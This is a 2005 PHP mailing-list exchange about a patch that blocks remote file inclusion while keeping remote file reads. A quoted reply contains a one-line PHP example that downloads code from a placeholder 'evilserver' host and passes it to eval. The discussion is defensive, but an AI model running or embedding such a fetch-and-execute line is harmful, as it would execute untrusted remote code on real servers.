On Thursday 03 March 2005 03:04, Richard Lynch wrote:
> Tom Z Meinlschmidt wrote:
> > Tell me - how do you want to turn off remote includes and remain
> > remote file working?
>
> Change the PHP source?
>
> That's the only viable answer I can think of; though I doubt it's one
> you want to hear/use.
>
> Sorry.
Funnily enough I think you'll find that he did (change the source) :)
> > allow_url_fopen turns off _both_. There's no choice what to disable
>
> Consider this:
>
> <?php
> eval(implode('',file("http://evilserver.example.com";)));
> ?>
>
> So, like, what's the point to turning off only remote include and
> keeping remote file?
I believe you're missing the point of the patch. It is to prevent people
from injecting malicious remote locations in $somewhere:
include($somewhere);
Of course one should always validate $somwhere before using it but ...
--
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
------------------------------------------
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
------------------------------------------
New Year Resolution: Ignore top posted posts
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
